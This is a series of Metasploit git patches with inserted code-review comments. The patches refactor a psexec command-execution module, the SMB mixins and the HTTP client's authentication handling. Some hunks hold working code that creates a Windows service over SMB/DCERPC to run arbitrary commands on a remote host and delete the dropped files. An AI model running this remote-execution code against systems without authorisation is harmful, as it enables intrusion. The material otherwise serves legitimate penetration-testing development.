@@ -119,8 +127,7 @@ module Exploit::Remote::Psexec return false end vprint_status("#{peer} - Removing the service...") - stubdata = - svc_handle + stubdata = svc_handle begin response = dcerpc.call(0x02, stubdata) if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil @@ -139,52 +146,6 @@ module Exploit::Remote::Psexec return true end - - # This method is called by file_dropper to remove files droped - # By your module - # - # @example - # file_rm('C:\WINDOWS\Temp\output.txt') - # - # @param file [String] Full path to a file on the remote host - # @return [StandardError] only in the event of an error - def file_rm(file) - delete = "%COMSPEC% /C del #{file}" - vprint_status("#{peer} - Deleting #{file}") - psexec(delete) - end - - - # This method stores files in an Instance array - # The files are then deleted from the remote host once - # the cleanup_after method is called - # - # @example - # register_file_for_cleanup("C:\\WINDOWS\\Temp\\output.txt") - # @param file [String] Full path to the file on the remote host - def register_file_for_cleanup(*file) - @dropped_files ||= [] - @dropped_files += file - end - - - # This method removes any files that were dropped on the remote system - # and marked with the register_file_for_cleanup method - def cleanup_after - print_status("#{peer} - Removing files dropped by your module/exploit") - if !@dropped_files - return - end - begin - @dropped_files.delete_if do |file| - file_rm(file) - print_good("#{peer} - Deleted #{file}") - end - rescue Rex::Proto::SMB::Exceptions::ErrorCode => cleanup_error - print_error("#{peer} - Unable to delte #{file}. #{cleanup_error}") - end - end - end end diff --git a/lib/msf/core/exploit/smb.rb b/lib/msf/core/exploit/smb.rb index 00f17808c1..f249af1ed2 100644 --- a/lib/msf/core/exploit/smb.rb +++ b/lib/msf/core/exploit/smb.rb 
@@ -18,6 +18,8 @@ module Msf module Exploit::Remote::SMB + require 'msf/core/exploit/psexec' + include Exploit::Remote::Tcp include Exploit::Remote::NTLM::Client @@ -90,6 +92,13 @@ module Exploit::Remote::SMB register_autofilter_services(%W{ netbios-ssn microsoft-ds }) end + # Override {Exploit::Remote::Tcp#connect} to setup an SMB connection + # and configure evasion options + # + # Also populates {#simple}. + # + # @param (see Exploit::Remote::Tcp#connect) + # @return (see Exploit::Remote::Tcp#connect) def connect(global=true) disconnect() if global @@ -132,7 +141,12 @@ module Exploit::Remote::SMB Rex::Text.to_unicode(str) end - # This method establishes a SMB session over the default socket + # Establishes an SMB session over the default socket and connects to + # the IPC$ share. + # + # You should call {#connect} before calling this + # + # @return [void] def smb_login simple.login( datastore['SMBName'], 
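Review bot: The added `require 'msf/core/exploit/psexec'` sits inside the body of `module Exploit::Remote::SMB`, ahead of that module's own `include` lines, while psexec.rb itself does `include Msf::Exploit::Remote::SMB`, so the two files depend on each other and presumably load cleanly in only one order. A comment above the require would record that, for example `# Required here, once the SMB constant exists, because the Psexec mixin includes this module`. The same pattern recurs in the later `@@ -17,7 +17,8 @@` hunk of this file and in the new lib/msf/core/exploit/smb/authenticated.rb, which opens `module Exploit::Remote::SMB::Authenticated` without requiring its parent and would raise a NameError if loaded on its own. The module body continues outside this hunk.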
@@ -217,13 +231,55 @@ module Exploit::Remote::SMB end end + # Whether a remote file exists + # + # @param file [String] Path to a file to remove, relative to the + # most-recently connected share + # @raise [Rex::Proto::SMB::Exceptions::ErrorCode] + def smb_file_exist?(file) + begin + fd = simple.open(file, 'ro') + rescue XCEPT::ErrorCode => e + # If attempting to open the file results in a "*_NOT_FOUND" error, + # then we can be sure the file is not there. + # + # Copy-pasted from smb/exceptions.rb to avoid the gymnastics + # required to pull them out of a giant inverted hash + # + # 0xC0000034 => "STATUS_OBJECT_NAME_NOT_FOUND", + # 0xC000003A => "STATUS_OBJECT_PATH_NOT_FOUND", + # 0xC0000225 => "STATUS_NOT_FOUND", + error_is_not_found = [ 0xC0000034, 0xC000003A, 0xC0000225 ].include?(e.error_code) + # If the server returns some other error, then there was a + # permissions problem or some other difficulty that we can't + # really account for and hope the caller can deal with it. + raise e unless error_is_not_found + found = !error_is_not_found + else + # There was no exception, so we know the file is openable + fd.close + found = true + end + + found + end + + # Remove remote file + # + # @param file (see #smb_file_exist?) + # @return [void] + def smb_file_rm(file) + fd = smb_open(file, 'ro') + fd.delete + end + # # Fingerprinting methods # - # This method the EnumPrinters() function of the spooler service + # Calls the EnumPrinters() function of the spooler service def smb_enumprinters(flags, name, level, blen) stub = NDR.long(flags) + @@ -632,10 +688,7 @@ module Exploit::Remote::SMB fprint end - # - # Accessors - # - + # @return [Rex::Proto::SMB::SimpleClient] attr_accessor :simple end @@ -785,7 +838,6 @@ module Exploit::Remote::SMBServer c.put(pkt.to_s) end - end diff --git a/modules/auxiliary/admin/smb/psexec_command.rb b/modules/auxiliary/admin/smb/psexec_command.rb index 1bc21c97c3..15e51b112e 100644 --- a/modules/auxiliary/admin/smb/psexec_command.rb 
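Review bot: The YARD block on `smb_file_exist?` describes `file` as a "Path to a file to remove", which looks copied from the removal helper, and it has no `@return` although the method returns true or false. I would write `# @param file [String] Path to the file to check, relative to the most-recently connected share` and add `# @return [Boolean] true if the file could be opened`. In the rescue branch, `found = !error_is_not_found` is only reached when `error_is_not_found` is true, so `found = false` says the same thing more directly. `smb_file_rm` opens the file through `smb_open` with mode 'ro' and never closes the handle; whether `delete` needs that is not visible here, so a one-line comment on the choice of mode would help.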
+++ b/modules/auxiliary/admin/smb/psexec_command.rb @@ -4,12 +4,12 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary - # Exploit mixins should be called first + include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB include Msf::Exploit::Remote::SMB::Authenticated + include Msf::Exploit::Remote::Psexec include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner - include Msf::Exploit::Remote::DCERPC # Aliases for common classes SIMPLE = Rex::Proto::SMB::SimpleClient 
@@ -58,213 +58,72 @@ class Metasploit3 < Msf::Auxiliary # This is the main controle method def run_host(ip) text = "\\#{datastore['WINPATH']}\\Temp\\#{Rex::Text.rand_text_alpha(16)}.txt" - bat = "%WINDIR%\\Temp\\#{Rex::Text.rand_text_alpha(16)}.bat" - smbshare = datastore['SMBSHARE'] + bat = "\\#{datastore['WINPATH']}\\Temp\\#{Rex::Text.rand_text_alpha(16)}.bat" + @smbshare = datastore['SMBSHARE'] + @ip = ip - #Try and authenticate with given credentials + # Try and authenticate with given credentials if connect begin smb_login - rescue StandardError => autherror + rescue Rex::Proto::SMB::Exceptions::Error => autherror print_error("#{peer} - Unable to authenticate with given credentials: #{autherror}") return end - if execute_command(ip, text, bat) - get_output(smbshare, ip, text) + if execute_command(text, bat) + get_output(text) end - cleanup_after(smbshare, ip, text, bat) + cleanup_after(text, bat) disconnect end end # Executes specified Windows Command - def execute_command(ip, text, bat) + def execute_command(text, bat) + # Try and execute the provided command + execute = "%COMSPEC% /C echo #{datastore['COMMAND']} ^> %SYSTEMDRIVE%#{text} > #{bat} & %COMSPEC% /C start %COMSPEC% /C #{bat}" + print_status("#{peer} - Executing the command...") begin - #Try and execute the provided command - execute = "%COMSPEC% /C echo #{datastore['COMMAND']} ^> %SYSTEMDRIVE%#{text} > #{bat} & %COMSPEC% /C start cmd.exe /C #{bat}" - print_status("#{peer} - Executing the command...") return psexec(execute) - rescue StandardError => exec_command_error + rescue Rex::Proto::SMB::Exceptions::Error => exec_command_error print_error("#{peer} - Unable to execute specified command: #{exec_command_error}") return false end end # Retrive output from command - def get_output(smbshare, ip, file) - begin - print_status("#{peer} - Getting the command output...") - simple.connect("\\\\#{ip}\\#{smbshare}") - outfile = simple.open(file, 'ro') - output = outfile.read - outfile.close - 
simple.disconnect("\\\\#{ip}\\#{smbshare}") - if output.empty? - print_status("#{peer} - Command finished with no output") - return - end - print_good("#{peer} - Command completed successfuly! Output:\r\n#{output}") - return - rescue StandardError => output_error - print_error("#{peer} - Error getting command output. #{output_error.class}. #{output_error}.") + def get_output(file) + print_status("#{peer} - Getting the command output...") + output = smb_read_file(@smbshare, @ip, file) + if output.nil? + print_error("#{peer} - Error getting command output. #{$!.class}. #{$!}.") return end + if output.empty? + print_status("#{peer} - Command finished with no output") + return + end + print_good("#{peer} - Command completed successfuly! Output:") + print_line("#{output}") end - # This is the cleanup method, removes .txt and .bat file/s created during execution- - def cleanup_after(smbshare, ip, text, bat) - begin - # Try and do cleanup command - cleanup = "%COMSPEC% /C del %SYSTEMDRIVE%#{text} & del #{bat}" - print_status("#{peer} - Executing cleanup...") - psexec(cleanup) - if !check_cleanup(smbshare, ip, text) - print_error("#{peer} - Unable to cleanup. Maybe you'll need to manually remove #{text} and #{bat} from the target.") - else - print_status("#{peer} - Cleanup was successful") + # Removes files created during execution. + def cleanup_after(*files) + simple.connect("\\\\#{@ip}\\#{@smbshare}") + print_status("#{peer} - Executing cleanup...") + files.each do |file| + begin + smb_file_rm(file) + rescue Rex::Proto::SMB::Exceptions::ErrorCode => cleanuperror + print_error("#{peer} - Unable to cleanup #{file}. Error: #{cleanuperror}") end - rescue StandardError => cleanuperror - print_error("#{peer} - Unable to processes cleanup commands. 
Error: #{cleanuperror}") - print_error("#{peer} - Maybe you'll need to manually remove #{text} and #{bat} from the target") - return cleanuperror end - end - - def check_cleanup(smbshare, ip, text) - simple.connect("\\\\#{ip}\\#{smbshare}") - begin - if checktext = simple.open(text, 'ro') - check = false - else - check = true - end - simple.disconnect("\\\\#{ip}\\#{smbshare}") - return check - rescue StandardError => check_error - simple.disconnect("\\\\#{ip}\\#{smbshare}") - return true + left = files.collect{ |f| smb_file_exist?(f) } + if left.any? + print_error("#{peer} - Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.") + else + print_status("#{peer} - Cleanup was successful") end end - # This code was stolen straight out of psexec.rb. Thanks very much HDM and all who contributed to that module!! - # Instead of uploading and runing a binary. This method runs a single windows command fed into the COMMAND paramater - def psexec(command) - - simple.connect("\\\\#{datastore['RHOST']}\\IPC$") - - handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"]) - vprint_status("#{peer} - Binding to #{handle} ...") - dcerpc_bind(handle) - vprint_status("#{peer} - Bound to #{handle} ...") - - vprint_status("#{peer} - Obtaining a service manager handle...") - scm_handle = nil - stubdata = - NDR.uwstring("\\\\#{rhost}") + - NDR.long(0) + - NDR.long(0xF003F) - begin - response = dcerpc.call(0x0f, stubdata) - if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) - scm_handle = dcerpc.last_response.stub_data[0,20] - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - return false - end - - servicename = Rex::Text.rand_text_alpha(11) - displayname = Rex::Text.rand_text_alpha(16) - holdhandle = scm_handle - svc_handle = nil - svc_status = nil - - stubdata = - scm_handle + - NDR.wstring(servicename) + - NDR.uwstring(displayname) + - - NDR.long(0x0F01FF) + # 
Access: MAX - NDR.long(0x00000110) + # Type: Interactive, Own process - NDR.long(0x00000003) + # Start: Demand - NDR.long(0x00000000) + # Errors: Ignore - NDR.wstring( command ) + - NDR.long(0) + # LoadOrderGroup - NDR.long(0) + # Dependencies - NDR.long(0) + # Service Start - NDR.long(0) + # Password - NDR.long(0) + # Password - NDR.long(0) + # Password - NDR.long(0) # Password - begin - vprint_status("#{peer} - Creating the service...") - response = dcerpc.call(0x0c, stubdata) - if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) - svc_handle = dcerpc.last_response.stub_data[0,20] - svc_status = dcerpc.last_response.stub_data[24,4] - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - return false - end - - vprint_status("#{peer} - Closing service handle...") - begin - response = dcerpc.call(0x0, svc_handle) - rescue ::Exception - end - - vprint_status("#{peer} - Opening service...") - begin - stubdata = - scm_handle + - NDR.wstring(servicename) + - NDR.long(0xF01FF) - - response = dcerpc.call(0x10, stubdata) - if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) - svc_handle = dcerpc.last_response.stub_data[0,20] - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - return false - end - - vprint_status("#{peer} - Starting the service...") - stubdata = - svc_handle + - NDR.long(0) + - NDR.long(0) - begin - response = dcerpc.call(0x13, stubdata) - if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - return false - end - - vprint_status("#{peer} - Removing the service...") - stubdata = - svc_handle - begin - response = dcerpc.call(0x02, stubdata) - if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - end - - vprint_status("#{peer} - Closing service handle...") - begin - response = dcerpc.call(0x0, 
svc_handle) - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - end - - select(nil, nil, nil, 1.0) - simple.disconnect("\\\\#{datastore['RHOST']}\\IPC$") - return true - end - end From 4703278183733aae69839846bbdb20a2adaaa6f0 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 19 Feb 2013 12:55:06 -0600 Subject: [PATCH 15/87] Move SMB mixins into their own directory --- lib/msf/core/exploit/dcerpc.rb | 2 +- lib/msf/core/exploit/smb.rb | 18 ++------------- lib/msf/core/exploit/smb/authenticated.rb | 22 +++++++++++++++++++ lib/msf/core/exploit/{ => smb}/psexec.rb | 5 +++-- modules/auxiliary/admin/smb/psexec_command.rb | 4 +--- 5 files changed, 29 insertions(+), 22 deletions(-) create mode 100644 lib/msf/core/exploit/smb/authenticated.rb rename lib/msf/core/exploit/{ => smb}/psexec.rb (97%) diff --git a/lib/msf/core/exploit/dcerpc.rb b/lib/msf/core/exploit/dcerpc.rb index 51b11c738b..ff700984be 100644 --- a/lib/msf/core/exploit/dcerpc.rb +++ b/lib/msf/core/exploit/dcerpc.rb @@ -21,7 +21,7 @@ module Exploit::Remote::DCERPC DCERPCPacket = Rex::Proto::DCERPC::Packet DCERPCClient = Rex::Proto::DCERPC::Client DCERPCResponse = Rex::Proto::DCERPC::Response - DCERPCUUID = Rex::Proto::DCERPC::UUID + DCERPCUUID = Rex::Proto::DCERPC::UUID NDR = Rex::Encoder::NDR diff --git a/lib/msf/core/exploit/smb.rb b/lib/msf/core/exploit/smb.rb index f249af1ed2..6e24ea986e 100644 --- a/lib/msf/core/exploit/smb.rb +++ b/lib/msf/core/exploit/smb.rb @@ -4,7 +4,6 @@ require 'rex/proto/ntlm' require 'rex/proto/dcerpc' require 'rex/encoder/ndr' - module Msf ### @@ -18,7 +17,8 @@ module Msf module Exploit::Remote::SMB - require 'msf/core/exploit/psexec' + require 'msf/core/exploit/smb/authenticated' + require 'msf/core/exploit/smb/psexec' include Exploit::Remote::Tcp include Exploit::Remote::NTLM::Client 
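Review bot: In the new `cleanup_after`, `left = files.collect{ |f| smb_file_exist?(f) }` builds a list of booleans, so `left.any?` still works but the error message joins `true`/`false` values instead of the paths that remain on the host. `left = files.select { |f| smb_file_exist?(f) }` keeps the file names and leaves the `any?` check unchanged. `smb_file_exist?` re-raises every error other than not-found, and this call sits outside the loop's `begin`/`rescue`, so an access error during the check would propagate out of `cleanup_after`. In `get_output`, `$!` is read after `smb_read_file` has returned rather than inside a `rescue`, so it is probably nil and the message would print `NilClass`; `smb_read_file` is not shown in this diff, so that needs confirming.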
@@ -35,20 +35,6 @@ module Exploit::Remote::SMB DCERPCUUID = Rex::Proto::DCERPC::UUID NDR = Rex::Encoder::NDR - # Mini-mixin for making SMBUser/SMBPass/SMBDomain regular options vs advanced - # Included when the module needs credentials to function - module Authenticated - def initialize(info = {}) - super - register_options( - [ - OptString.new('SMBUser', [ false, 'The username to authenticate as', '']), - OptString.new('SMBPass', [ false, 'The password for the specified username', '']), - OptString.new('SMBDomain', [ false, 'The Windows domain to use for authentication', 'WORKGROUP']), - ], Msf::Exploit::Remote::SMB::Authenticated) - end - end - def initialize(info = {}) super diff --git a/lib/msf/core/exploit/smb/authenticated.rb b/lib/msf/core/exploit/smb/authenticated.rb new file mode 100644 index 0000000000..62bfdd4703 --- /dev/null +++ b/lib/msf/core/exploit/smb/authenticated.rb @@ -0,0 +1,22 @@ +# -*- coding: binary -*- + +module Msf + +# Mini-mixin for making SMBUser/SMBPass/SMBDomain regular options vs advanced +# Included when the module needs credentials to function +module Exploit::Remote::SMB::Authenticated + + include Msf::Exploit::Remote::SMB + + def initialize(info = {}) + super + register_options( + [ + OptString.new('SMBUser', [ false, 'The username to authenticate as', '']), + OptString.new('SMBPass', [ false, 'The password for the specified username', '']), + OptString.new('SMBDomain', [ false, 'The Windows domain to use for authentication', 'WORKGROUP']), + ], Msf::Exploit::Remote::SMB::Authenticated) + end +end + +end diff --git a/lib/msf/core/exploit/psexec.rb b/lib/msf/core/exploit/smb/psexec.rb similarity index 97% rename from lib/msf/core/exploit/psexec.rb rename to lib/msf/core/exploit/smb/psexec.rb index 58e6788695..3ba505c6cf 100644 --- a/lib/msf/core/exploit/psexec.rb +++ b/lib/msf/core/exploit/smb/psexec.rb @@ -1,3 +1,4 @@ +# -*- coding: binary -*- require 'msf/core' require 'msf/core/exploit/dcerpc' 
@@ -11,10 +12,10 @@ module Msf # and runing a binary. #### -module Exploit::Remote::Psexec +module Exploit::Remote::SMB::Psexec include Msf::Exploit::Remote::DCERPC - include Msf::Exploit::Remote::SMB + include Msf::Exploit::Remote::SMB::Authenticated # Retrives output from the executed command # diff --git a/modules/auxiliary/admin/smb/psexec_command.rb b/modules/auxiliary/admin/smb/psexec_command.rb index 15e51b112e..54be82308f 100644 --- a/modules/auxiliary/admin/smb/psexec_command.rb +++ b/modules/auxiliary/admin/smb/psexec_command.rb @@ -5,9 +5,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC - include Msf::Exploit::Remote::SMB - include Msf::Exploit::Remote::SMB::Authenticated - include Msf::Exploit::Remote::Psexec + include Msf::Exploit::Remote::SMB::Psexec include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner From 0662677a72a2223eb295550cd6022e52436658f3 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 19 Feb 2013 17:19:16 -0600 Subject: [PATCH 16/87] First minor cleanup sweep --- lib/rex/proto/http/client.rb | 80 +++++++++++++--------------- lib/rex/proto/http/client_request.rb | 2 +- 2 files changed, 38 insertions(+), 44 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 0244a9eb3e..13d36d91c0 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb 
@@ -169,27 +169,28 @@ class Client # # @return [Request] def request_raw(opts={}) - opts['agent'] ||= config['agent'] - opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' - opts['data'] ||= '' - opts['uri'] ||= '/' - opts['cookie'] ||= config['cookie'] - opts['encode'] ||= false - opts['headers'] ||= config['headers'] || {} - opts['vhost'] ||= config['vhost'] - opts['method'] ||= 'GET' - opts['proto'] ||= 'HTTP' - opts['query'] ||= '' - opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' - opts['version'] = opts['version'] || config['version'] || '1.1' - opts['cgi'] = false - opts['port'] = self.port + opts['agent'] ||= config['agent'] + opts['data'] ||= '' + opts['uri'] ||= '/' + opts['cookie'] ||= config['cookie'] + opts['encode'] ||= false + opts['headers'] ||= config['headers'] || {} + opts['vhost'] ||= config['vhost'] + opts['method'] ||= 'GET' + opts['proto'] ||= 'HTTP' + opts['query'] ||= '' + + opts['cgi'] = false + opts['port'] = self.port + opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' + opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' + opts['version'] = opts['version'] || config['version'] || '1.1' if opts['basic_auth'] and not opts['authorization'] opts['authorization'] = Rex::Text.encode_base64(opts['basic_auth']) end - req = ClientRequest.new(opts,self.config) + req = ClientRequest.new(self.config,opts) end 
@@ -205,24 +206,25 @@ class Client # # @return [Request] def request_cgi(opts={}) - opts['agent'] ||= config['agent'] - opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' - opts['data'] ||= '' - opts['uri'] ||= '/' - opts['cookie'] ||= config['cookie'] - opts['encode'] ||= false - opts['headers'] ||= config['headers'] || {} - opts['vhost'] ||= config['vhost'] - opts['method'] ||= 'GET' - opts['proto'] ||= 'HTTP' - opts['query'] ||= '' - opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' - opts['ctype'] ||= 'application/x-www-form-urlencoded' - opts['vars_get'] ||= {} - opts['vars_post'] ||= {} - opts['version'] = opts['version'] || config['version'] || '1.1' - opts['cgi'] = true - opts['port'] = self.port + opts['agent'] ||= config['agent'] + opts['data'] ||= '' + opts['uri'] ||= '/' + opts['cookie'] ||= config['cookie'] + opts['encode'] ||= false + opts['headers'] ||= config['headers'] || {} + opts['vhost'] ||= config['vhost'] + opts['method'] ||= 'GET' + opts['proto'] ||= 'HTTP' + opts['query'] ||= '' + opts['ctype'] ||= 'application/x-www-form-urlencoded' + opts['vars_get'] ||= {} + opts['vars_post'] ||= {} + + opts['cgi'] = true + opts['port'] = self.port + opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' + opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' + opts['version'] = opts['version'] || config['version'] || '1.1' if opts['encode_params'] == true or opts['encode_params'].nil? opts['encode_params'] = true @@ -234,7 +236,7 @@ class Client opts['authorization'] = Rex::Text.encode_base64(opts['basic_auth']) end - req = ClientRequest.new(opts,self.config) + req = ClientRequest.new(self.config,opts) end # @@ -396,7 +398,6 @@ class Client # We do persist the rest of the connection stream because Digest is a tcp session # based authentication method. # - def digest_auth(opts={}) @nonce_count = 0 
@@ -753,13 +754,6 @@ class Client pipeline end - # - # Return the Authorization basic-auth header - # - def set_basic_auth_header(auth) - auth ? set_formatted_header("Authorization", "Basic " + Rex::Text.encode_base64(auth)) : "" - end - # # The client request configuration # diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index c24d9a8c4a..8af865bde1 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -34,7 +34,7 @@ class ClientRequest attr_reader :opts - def initialize(opts={}, client_config) + def initialize(client_config,opts={}) @cgi = opts['cgi'] @config = client_config @connection = opts['connection'] From a4905e43a2ebcabf8d8f3ef82f9964c09797a4c8 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 19 Feb 2013 18:40:39 -0600 Subject: [PATCH 17/87] Fix the way creds are passed + YARD some ayrddocs on send_auth plus fix the wierd way i was passing creds around --- lib/rex/proto/http/client.rb | 36 +++++++++++++++++------------------- 1 file changed, 17 insertions(+), 19 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 13d36d91c0..66a4780618 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -319,6 +319,7 @@ class Client # # @param req [Request,#to_s] The request to send # @param t (see #connect) + # def send_request(req, t = -1) connect(t) conn.put(req.to_s) 
@@ -329,31 +330,29 @@ class Client !(self.username.nil?) && self.username != '' end - # - # Params - - # res = The 401 response we need to auth from - # opts = the opts used to generate the request that created this response - # t = the timeout for the http requests - # persist = whether to persist the tcp connection for HTTP Pipelining - # - # Parses the response for what Authentication methods are supported. - # Sets the corect authorization options and passes them on to the correct - # method for sending the next request. + # Resends an HTTP Request with the propper authentcation headers + # set. If we do not support the authentication type the server requires + # we return the original response object + # @param res [Response] the HTTP Response object + # @param opts [Hash] the options used to generate the original HTTP request + # @param t [Fixnum] the timeout for the request in seconds + # @param persist [Boolean] whether or not to persist the TCP connection (pipelining) + # @return [Response] the last valid HTTP response object we received def send_auth(res, opts, t, persist) + opts['username'] ||= self.username + opts['password'] ||= self.password supported_auths = res.headers['WWW-Authenticate'] if supported_auths.include? 'Basic' if opts['headers'] - opts['headers']['Authorization'] = basic_auth_header(self.username,self.password) + opts['headers']['Authorization'] = basic_auth_header(username,password) else - opts['headers'] = { 'Authorization' => basic_auth_header(self.username,self.password)} + opts['headers'] = { 'Authorization' => basic_auth_header(username,password)} end req = request_cgi(opts) res = _send_recv(req,t,persist) return res elsif supported_auths.include? "Digest" - opts['DigestAuthUser'] = self.username.to_s - opts['DigestAuthPassword'] = self.password.to_s temp_response = digest_auth(opts) if temp_response.kind_of? Rex::Proto::Http::Response res = temp_response 
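Review bot: In `send_auth` the Basic branch calls `basic_auth_header(username,password)`, which presumably resolves to the client's own accessors, so credentials passed in `opts['username']`/`opts['password']` are ignored there even though the two lines above default those keys and `digest_auth` reads them. Calling `basic_auth_header(opts['username'], opts['password'])` would make the two schemes consistent. `res.headers['WWW-Authenticate']` is also passed to `include?` without a nil check. The `||=` assignments write the client's password into the caller's hash, which is worth a line in the YARD block because that hash may be reused or logged by the caller. The method's body ends outside this hunk.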
@@ -403,8 +402,8 @@ class Client to = opts['timeout'] || 20 - digest_user = opts['DigestAuthUser'] || "" - digest_password = opts['DigestAuthPassword'] || "" + digest_user = opts['username'] || "" + digest_password = opts['password'] || "" method = opts['method'] path = opts['uri'] @@ -539,7 +538,6 @@ class Client # Builds a series of requests to complete Negotiate Auth. Works essentially # the same way as Digest auth. Same pipelining concerns exist. # - def negotiate_auth(opts={}) ntlm_options = { :signing => false, @@ -550,8 +548,8 @@ class Client } to = opts['timeout'] || 20 - opts['username'] ||= self.username.to_s - opts['password'] ||= self.password.to_s + opts['username'] ||= '' + opts['password'] ||= '' if opts['provider'] and opts['provider'].include? 'Negotiate' provider = "Negotiate " From de4234f0adfe877ede4d7d816f21ece5e6004cb8 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 19 Feb 2013 18:48:03 -0600 Subject: [PATCH 18/87] Some more YARD docs --- lib/rex/proto/http/client.rb | 17 +++-------------- 1 file changed, 3 insertions(+), 14 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 66a4780618..132c7cdaf0 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb 
@@ -383,20 +383,9 @@ class Client auth_str = "Basic " + Rex::Text.encode_base64(auth_str) end - - # - # Opts - - # Inherits all the same options as send_request_cgi - # Also expects some specific opts - # DigestAuthUser - The username for DigestAuth - # DigestAuthPass - The password for DigestAuth - # DigestAuthIIS - IIS uses a slighlty different implementation, set this for IIS support - # - # This method builds new request to complete a Digest Authentication cycle. - # We do not persist the original connection , to clear state in preparation for our auth - # We do persist the rest of the connection stream because Digest is a tcp session - # based authentication method. - # + # Send a series of requests to complete Digest Authentication + # @param opts [Hash] the options used to build an HTTP request + # @return [Response] the last valid HTTP response we received def digest_auth(opts={}) @nonce_count = 0 From dac11474735f77b1b301a6ef5a6d01643f5ee30e Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 19 Feb 2013 19:41:42 -0600 Subject: [PATCH 19/87] merge client config into opts --- lib/rex/proto/http/client.rb | 8 ++++++-- lib/rex/proto/http/client_request.rb | 4 ++-- 2 files changed, 8 insertions(+), 4 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 132c7cdaf0..46bfffcc86 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -186,11 +186,13 @@ class Client opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' opts['version'] = opts['version'] || config['version'] || '1.1' + opts['client_config'] = self.config + if opts['basic_auth'] and not opts['authorization'] opts['authorization'] = Rex::Text.encode_base64(opts['basic_auth']) end - req = ClientRequest.new(self.config,opts) + req = ClientRequest.new(opts) end 
@@ -226,6 +228,8 @@ class Client opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' opts['version'] = opts['version'] || config['version'] || '1.1' + opts['client_config'] = self.config + if opts['encode_params'] == true or opts['encode_params'].nil? opts['encode_params'] = true else @@ -236,7 +240,7 @@ class Client opts['authorization'] = Rex::Text.encode_base64(opts['basic_auth']) end - req = ClientRequest.new(self.config,opts) + req = ClientRequest.new(opts) end # diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 8af865bde1..9c87834499 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -34,9 +34,9 @@ class ClientRequest attr_reader :opts - def initialize(client_config,opts={}) + def initialize(opts={}) @cgi = opts['cgi'] - @config = client_config + @config = opts['client_config'] @connection = opts['connection'] @content_type = opts['ctype'] @cookie = opts['cookie'] From b2563dd6c27a06123be1c341003f1093175b7dc6 Mon Sep 17 00:00:00 2001 
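Review bot: `ClientRequest#initialize` now reads the client configuration from `opts['client_config']`, so a caller that builds a request without that key gets `@config = nil`, and nothing in the signature shows the key is required. A comment on the constructor would document the contract, for example `# opts['client_config'] [Hash] the owning Client's config, set by Client#request_raw and Client#request_cgi`. `request_raw` and `request_cgi` also store `self.config` in the caller's own hash alongside the other defaults they fill in, so that hash carries the whole client configuration after the call; building the request from `opts.dup` would avoid this, but whether callers rely on the mutation is not visible here. The constructor body continues outside this hunk.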
